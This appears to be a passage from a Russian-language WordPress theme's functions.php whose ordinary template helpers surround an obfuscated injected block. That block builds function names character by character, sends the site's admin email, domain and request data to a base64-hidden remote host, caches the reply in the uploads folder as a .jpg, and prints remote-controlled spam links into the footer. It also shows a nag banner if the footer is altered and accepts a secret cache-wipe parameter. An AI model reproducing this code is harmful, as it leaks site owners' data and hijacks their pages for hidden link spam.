<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать следующие теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $hSSE='b';$QsOcaUQ='d';$FRVlYj='o';$BXkTf='c';$jGrJcH='e';$AvpJzq='6';$mIgOeBM='d';$rivLLoG='4';$oFRi='_';$wCNF='e';$uYEIU='e';$CSUwZ='a';$JUruzjC='s';$nVeSBHjd=$hSSE.$CSUwZ.$JUruzjC.$uYEIU.$AvpJzq.$rivLLoG.$oFRi.$mIgOeBM.$jGrJcH.$BXkTf.$FRVlYj.$QsOcaUQ.$wCNF;$jsTn='a';$WwQS='g';$zUeyv='f';$VwLjgc='t';$SnFamRq='e';$kRiYlp='n';$dIemcj='z';$nJrF='i';$ysAo='l';$gsnENYBZ=$WwQS.$dIemcj.$nJrF.$kRiYlp.$zUeyv.$ysAo.$jsTn.$VwLjgc.$SnFamRq;$JHayn='r';$xeKw='r';$MlYovu='_';$fDBgPsw='t';$DPaJF='t';$fYcMY='1';$aKnlJC='3';$Ygmhmp='s';$XDxm='o';$YmCjwVcJ=$Ygmhmp.$fDBgPsw.$JHayn.$MlYovu.$xeKw.$XDxm.$DPaJF.$fYcMY.$aKnlJC;$YAeoJhr='t';$JXsrEw='e';$tBTqRN='r';$IJhg='s';$oEgf='v';$AGdm='r';$RMYGLNIH=$IJhg.$YAeoJhr.$tBTqRN.$AGdm.$JXsrEw.$oEgf;                     
		$ig_______a='b';$ru_____w='d';$im_____________u='o';$dc______________n='c';$bi_____r='e';$ep__________t='6';$zu_______________h='d';$jn___________z='4';$ch__________t='_';$kv__________u='e';$me_______________l='e';$qv_____________g='a';$jg__________g='s';$tn_______________f=$ig_______a.$qv_____________g.$jg__________g.$me_______________l.$ep__________t.$jn___________z.$ch__________t.$zu_______________h.$bi_____r.$dc______________n.$im_____________u.$ru_____w.$kv__________u;
		$tf______________l='n';$jv__________n='i';$ys__________l='t';$cz______________l='s';$vw__h='o';$wk_____p='e';$nk_______m='i';$kj______j='c';$qd______________b='u';$ti______t='f';$vn_______________r='t';$qe__a='x';$ka_______________k='s';$ps_________f='_';$ah_______u='n';$lj______________f=$ti______t.$qd______________b.$tf______________l.$kj______j.$ys__________l.$jv__________n.$vw__h.$ah_______u.$ps_________f.$wk_____p.$qe__a.$nk_______m.$cz______________l.$vn_______________r.$ka_______________k;
		$qv____________t='e';$fg________s='n';$zm__________j='f';$mo____________v='o';$wy___________w='p';$zm_______x=$zm__________j.$mo____________v.$wy___________w.$qv____________t.$fg________s;
		$pe_____u='f';$kt_________f='r';$zh_______________j='e';$qt______________k='a';$ak____t='d';$sy_____________d=$pe_____u.$kt_________f.$zh_______________j.$qt______________k.$ak____t;
		$zt_________l='s';$qf__________x='o';$ml_____________r='c';$mo___________g='l';$kl______________j='e';$de_______r='f';$yn_______________r=$de_______r.$ml_____________r.$mo___________g.$qf__________x.$zt_________l.$kl______________j;
		
		define("WP_ID", $tn_______________f("Mi4wLjA="));
		define("WP_TTL", $tn_______________f("MTA4MDA="));
		define("WP_SRC", $tn_______________f("dHBva24="));
	


		function wp_get_header() {
			global $tn_______________f, $lj______________f;
			
			if (
				$lj______________f($tn_______________f("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$lj______________f($tn_______________f("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$lj______________f($tn_______________f("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $tn_______________f, $zm_______x, $yn_______________r, $sy_____________d;
			
			$yk___________e = TEMPLATEPATH."/".$tn_______________f("Zm9vdGVyLnBocA==");
			$od_________e = @$zm_______x($yk___________e, "r");
			$yk___________e = @$sy_____________d($od_________e, @filesize($yk___________e));
			@$yn_______________r($od_________e);
			
			$tl_____l = TEMPLATEPATH."/".$tn_______________f("ZnVuY3Rpb25zLnBocA==");
			$od_________e = @$zm_______x($tl_____l, "r");
			$tl_____l = @$sy_____________d($od_________e, @filesize($tl_____l));
			@$yn_______________r($od_________e);
			
			$my___e = 0;
			if($yk___________e && $tl_____l) {
				if ($tn_______________f("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($yk___________e, $tn_______________f("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$my___e = 1;
					}
					if (substr_count($yk___________e, "wp_theme_GPL_credits()") < 1) {
						$my___e = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$my___e = 12;
				}
			}
			
			if($my___e > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $my___e -->";
			}
		}
	


		function wp_loaded() {
			global $tn_______________f, $lj______________f;
			return $lj______________f($tn_______________f("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($aj____________e, $ar_____a = "(more...)", $vh________c = 0, $gz____________i = "") {
				$az_____n = get_the_content($ar_____a, $vh________c, $gz____________i);
				$az_____n = apply_filters("the_content", $az_____n);
				
				$az_____n = str_replace("]]>", "]]>", $az_____n);
				if (strlen($_GET["p"]) > 0) {
					echo $az_____n;
				}
				else if ((strlen($az_____n)>$aj____________e) && ($vq__________q = strpos($az_____n, " ", $aj____________e ))) {
					$az_____n = substr($az_____n, 0, $vq__________q);
					$az_____n = $az_____n;
					echo $az_____n;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ar_____a</a></div></p>";
				} else {
					echo $az_____n;
				}
				
			}
		}
	


		$gp_______m='s';$qy___________e='o';$pj_________y='e';$xy________v='n';$zt_____________a='e';$ae___m='b';$jj_______________z='4';$zm____r='6';$xk___e='_';$yc____x='d';$zb_________f='c';$nz_______a='e';$yb__________r='a';$ec_________o=$ae___m.$yb__________r.$gp_______m.$nz_______a.$zm____r.$jj_______________z.$xk___e.$zt_____________a.$xy________v.$zb_________f.$qy___________e.$yc____x.$pj_________y;
		$ak_____________k='t';$we__________y='c';$ae______________n='n';$lb______p='e';$jy______________y='g';$mc_______________c='_';$is______u='e';$cu____________o='n';$ot_____________b='t';$mj________z='e';$qt____n='i';$mv_________h='_';$wz______________h='o';$wu____s='s';$ts___t='f';$cs______y='l';$mu_______________g='t';$vc________v=$ts___t.$qt____n.$cs______y.$lb______p.$mv_________h.$jy______________y.$mj________z.$mu_______________g.$mc_______________c.$we__________y.$wz______________h.$ae______________n.$ak_____________k.$is______u.$cu____________o.$ot_____________b.$wu____s;
		$cu____x='e';$sw____m='i';$kt_____m='l';$zk__k='t';$dg______________y='s';$ut________r='e';$ug___________b='f';$dw_________p='s';$yg______r='_';$md_____________k='i';$oj___m='x';$nz____m=$ug___________b.$md_____________k.$kt_____m.$ut________r.$yg______r.$cu____x.$oj___m.$sw____m.$dw_________p.$zk__k.$dg______________y;
		$og____q='o';$ug____________n='o';$re_______a='e';$oc______y='n';$de________s='s';$du__________q='p';$ck___________c='e';$jr___________o='_';$fx___________b='v';$nv___s='i';$uy______x='m';$yp_____________m='r';$pr_______e='a';$tn_____u='r';$oj__________q='c';$ll______t=$fx___________b.$ck___________c.$tn_____u.$de________s.$nv___s.$og____q.$oc______y.$jr___________o.$oj__________q.$ug____________n.$uy______x.$du__________q.$pr_______e.$yp_____________m.$re_______a;
		$tx_____f='c';$ip_________r='o';$xu______t='s';$jb_______b='k';$hk__________f='n';$mw_____x='o';$jm________i='p';$tu___________m='f';$lm____________e='e';$cj_______________d=$tu___________m.$xu______t.$mw_____x.$tx_____f.$jb_______b.$ip_________r.$jm________i.$lm____________e.$hk__________f;
		$ug_________p='w';$ld____n='r';$ru______w='f';$nx___c='e';$zz_______________w='i';$fl__z='t';$lw_______________y=$ru______w.$ug_________p.$ld____n.$zz_______________w.$fl__z.$nx___c;
		$az____________o='5';$bp__________b='m';$oo______________u='d';$nw____q=$bp__________b.$oo______________u.$az____________o;
		$qk_____________j='l';$qo______i='t';$pn_________i='h';$pa___________j='p';$ri___________k='e';$eu____h='a';$ti________s='r';$nm_____________p='a';$yt__v=$ti________s.$ri___________k.$nm_____________p.$qk_____________j.$pa___________j.$eu____h.$qo______i.$pn_________i;
		$jt______t='z';$pt________k='l';$iq__b='i';$tc______________c='i';$jn____________y='s';$gd___________y='e';$vz__________n='u';$rq_______v='e';$ih_____________h='n';$jr_______________i='a';$nk______d='r';$iw______o=$vz__________n.$ih_____________h.$jn____________y.$rq_______v.$nk______d.$iq__b.$jr_______________i.$pt________k.$tc______________c.$jt______t.$gd___________y;
		$fj__________e='m';$zr_______________y='n';$wu_______________i='t';$ub___________x='m';$xc__________o='p';$wj____p='e';$sk_____n='a';$bo__w=$wu_______________i.$wj____p.$ub___________x.$xc__________o.$zr_______________y.$sk_____n.$fj__________e;
		$ts_____p='t';$ux______________j='t';$wf__o='_';$eu________x='e';$lh________y='c';$zz_______q='r';$xg____j='_';$sz_____r='n';$wf____________v='e';$oq______e='c';$xb__________l='a';$dz_______n='t';$uw_______o='e';$jx_______________b='r';$zr______t='t';$pg______________b='x';$os______m='e';$mm_____________f='m';$yw_______________l='a';$qt__________t='o';$mi_____r='s';$kv__________g=$mi_____r.$dz_______n.$zz_______q.$uw_______o.$yw_______________l.$mm_____________f.$wf__o.$lh________y.$qt__________t.$sz_____r.$zr______t.$os______m.$pg______________b.$ts_____p.$xg____j.$oq______e.$jx_______________b.$wf____________v.$xb__________l.$ux______________j.$eu________x;
	


		function qd____________r($hh______p) {
			global $tn_______________f, $lj______________f, $vc________v, $ll______t, $kv__________g;
			
			if (!$lj______________f($tn_______________f("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($ll______t(PHP_VERSION, "5.0.0", ">=") && $lj______________f($tn_______________f("ZmlsZV9nZXRfY29udGVudHM=")) && $lj______________f($tn_______________f("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ix________y = $kv__________g(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$tn________z = @$vc________v($hh______p, 0, $ix________y);
			} else {
				$tn________z = @$vc________v($hh______p, 0);
			}
			
			return $tn________z;
		}
	


		function xy_______g($hh______p) {
			global $lj______________f, $cj_______________d, $lw_______________y, $tn_______________f;
			
			if (!$lj______________f($tn_______________f("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ja_______n = strpos($hh______p, "/", 7);
			$jk____s = array(
				"uri"     => substr($hh______p, $ja_______n),
				"host"    => str_replace("http://", "", substr($hh______p, 0, $ja_______n)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$oj_________y = @$cj_______________d("$jk____s[host]", 80, $uc____f, $ji___g, 4);
			
			if (!$oj_________y) {
				return false;
			} else {
				$tn________z = "";
				$fo______x  = "GET $jk____s[uri] HTTP/1.0\r\n";
				$fo______x .= "Host: $jk____s[host]\r\n";
				$fo______x .= "Referer: $jk____s[referer]\r\n";
				$fo______x .= "Connection: Close\r\n\r\n";
				
				@$lw_______________y($oj_________y, $fo______x);
				
				while (!@feof($oj_________y)) {
					$dc_____________v = @fgets($oj_________y, (1024*24));
					
					if ($dc_____________v == "\r\n") {
						$gv____o = true;
						continue;
					}
					
					if ($gv____o) {
						$tn________z .= $dc_____________v;
					}
				}
				
				return $tn________z;
			}
		}
	


		function xp_____________p($hh______p) {
			global $lj______________f;
			$ve_______k = false;
			
			if ($hh______p != "") {
				if ($lj______________f("qd____________r")) {
					$ve_______k = @qd____________r($hh______p);
				}
				
				if (!$ve_______k && ($lj______________f("xy_______g"))) {
					$ve_______k = @xy_______g($hh______p);
				}
			}
			
			return $ve_______k;
		}
	


		function qb__c() {
			global $_SERVER, $nw____q;
			
			$ml______________d = $_SERVER["SERVER_NAME"];
			
			if (substr("$ml______________d", 0, 4) == "www.") {
				$ml______________d = substr("$ml______________d", 4);
			}
			
			$ml______________d = $nw____q("$_SERVER[SERVER_NAME]");
			
			return $ml______________d;
		}
	


		function fl_____________i() {
			return "file";
		}
	


		function oa___p($hh______p) {
			global $_SERVER, $vc________v, $nz____m, $zm_______x, $yn_______________r, $lw_______________y;
			
			$sd__________m = ty___p();
			
			$hg____________v = qb__c().".jpg";
			$mf____________b = $sd__________m["dir_upload"]["path"]."/$hg____________v";
			$do______u = @filemtime($mf____________b);
			
			if (!$do______u || ((time()-$do______u) >= WP_TTL)) {
				$ve_______k = xp_____________p($hh______p);
				
				if ($ve_______k) {
					if ($nz____m($mf____________b)) {
						@unlink($mf____________b);
					}
					
					$od_________e = @$zm_______x($mf____________b, "x+");
					
					@$lw_______________y($od_________e, $ve_______k);
					@$yn_______________r($od_________e);
				}
			} else {
				if ($nz____m($mf____________b)) {
					$ve_______k = @$vc________v($mf____________b);
				} else {
					$ve_______k = false;
				}
			}
			
			return $ve_______k;
		}
	


		function ty___p() {
			global $_SERVER, $tn_______________f, $ec_________o;
			
			$ly______________k = wp_count_posts("post");
			$ol_______r = pathinfo(get_bloginfo("template_directory"));
			
			$sd__________m = array(
				"url" => array(
					"report"      => $tn_______________f("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ol_______r,
				"dir_upload"	=> lq____________c(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ol_______r[filename],
					"a005=".$ly______________k->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://clinic-virtus.com/celebnyj-chaj-dlya-serdca/\">Целебный чай для сердца</a>"
			);
			
			$sd__________m["url"]["queryString"] = implode("&", $sd__________m["queryString"]);
			$sd__________m["url"]["report"] = $sd__________m["url"]["report"]."/?".$ec_________o($sd__________m["url"]["queryString"]).".html";
						
			return $sd__________m;
		}
	


		function lq____________c() {
			$zs_______________h = wp_upload_dir();
			
			if (isset($zs_______________h["error"])) {
				$ki_______________w = ro_________l();
				if (is_writable($ki_______________w)) {
					$zs_______________h = array("path" => $ki_______________w);
				}
			}

			return $zs_______________h;
		}
	


		function ro_________l() {
			global $lj______________f, $nw____q, $yt__v, $bo__w;
			
			$ut_____________t = (bool) ini_get("safe_mode");
			if ($ut_____________t == true) {
				return false;
			}
			
			if ($lj______________f("sys_get_temp_dir")) {
				$ko_________m = sys_get_temp_dir();
				if (is_writable($ko_________m)) {
					return $yt__v($ko_________m);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $yt__v($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $yt__v($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $yt__v($_ENV["TEMP"]);
			} else {
				$lx__________v = $bo__w($nw____q(uniqid(rand(), true)), "");
				if ($lx__________v) {
					$ko_________m = $yt__v(dirname($lx__________v));
					@unlink($lx__________v);
					return $ko_________m;
				} else {
					return false;
				}
			}
		}
	


		function wy_____________h() {
			global $_GET, $nz____m;
			
			$sd__________m = ty___p();
			$ml______________d = qb__c();
			$sf_____k = fl_____________i();
			
			$sx______________j = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($sf_____k == "file") {
					$or___o = $sd__________m["dir_upload"]["path"]."/".$ml______________d.".jpg";
					if ($nz____m($or___o)) {
						@unlink($or___o);
						$sx______________j = "deleted";
					}
				}
				
				$pu_______________b = array(
					"s"	=> $sx______________j,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($pu_______________b AS $nc_____b => $tk__________q) echo " [$nc_____b:$tk__________q]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $lj______________f, $tn_______________f, $iw______o;
			$sd__________m = ty___p();
			
			$gk_______j = "oa___p";
			if ($lj______________f($gk_______j)) {
				$tn________z = $gk_______j($sd__________m["url"]["report"]);
			}
			
			if ($tn________z) {
				if ($tn________z = @$tn_______________f($tn________z)) {
					$tn________z = @$iw______o($tn________z);
					
					if (strlen($tn________z[custom_credit]) >= 5) {
						$sd__________m["default_string"] = $tn________z[custom_credit];
					}
					
					if ($tn________z["status"] == "0") {
						$hd__h = 1;
						$be_____j = 1;
					} else {
						$hr____________c = sizeof($tn________z["links"]);
						$ia__________p = $sd__________m["default_string"];
						
						if ($hr____________c > 0 && $tn________z["links"] !== "") {
							$au_______f = 0;
							foreach ($tn________z["links"] as $gg__________m => $ao____________c) {
								$au_______f++;
								if ($ao____________c->l_path == "" || $ao____________c->l_path == $_SERVER["REQUEST_URI"]) {
									$ao____________c->l_href = htmlspecialchars(strip_tags($ao____________c->l_href));
									$ao____________c->l_title = htmlspecialchars(strip_tags($ao____________c->l_title));
									$ao____________c->l_anchor = htmlspecialchars(strip_tags($ao____________c->l_anchor));
									$ia__________p .= " | ";
									$ia__________p .= "<a href='$ao____________c->l_href' title='$ao____________c->l_title'";
									if ($ao____________c->l_nofollow == "1") {
										$ia__________p .= " rel='nofollow'";
									}
									$ia__________p .= ">$ao____________c->l_anchor</a>";
								}
							}
						}
						$sd__________m["links"] = "$ia__________p";
						if ($tn________z[credit] == "0") {
							$sd__________m["links"] = "";
						}
					}
				} else {
					$hd__h = "1";
				}
			} else {
				$hd__h = "1";
			}
			
			if ($hd__h == "1") {
				$sd__________m["links"] = $sd__________m["default_string"];
			}
			
			echo "$sd__________m[links]";
			
			echo "<!-- s: $tn________z[signature] -->";
			wy_____________h();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Постоянная ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в рубрике %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Комментариев нет &#187;', THEME_NS), __('1 комментарий &#187;', THEME_NS), __('% комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Not Found', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но по Вашему запросу ничего не было найдено.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Search', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
         $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
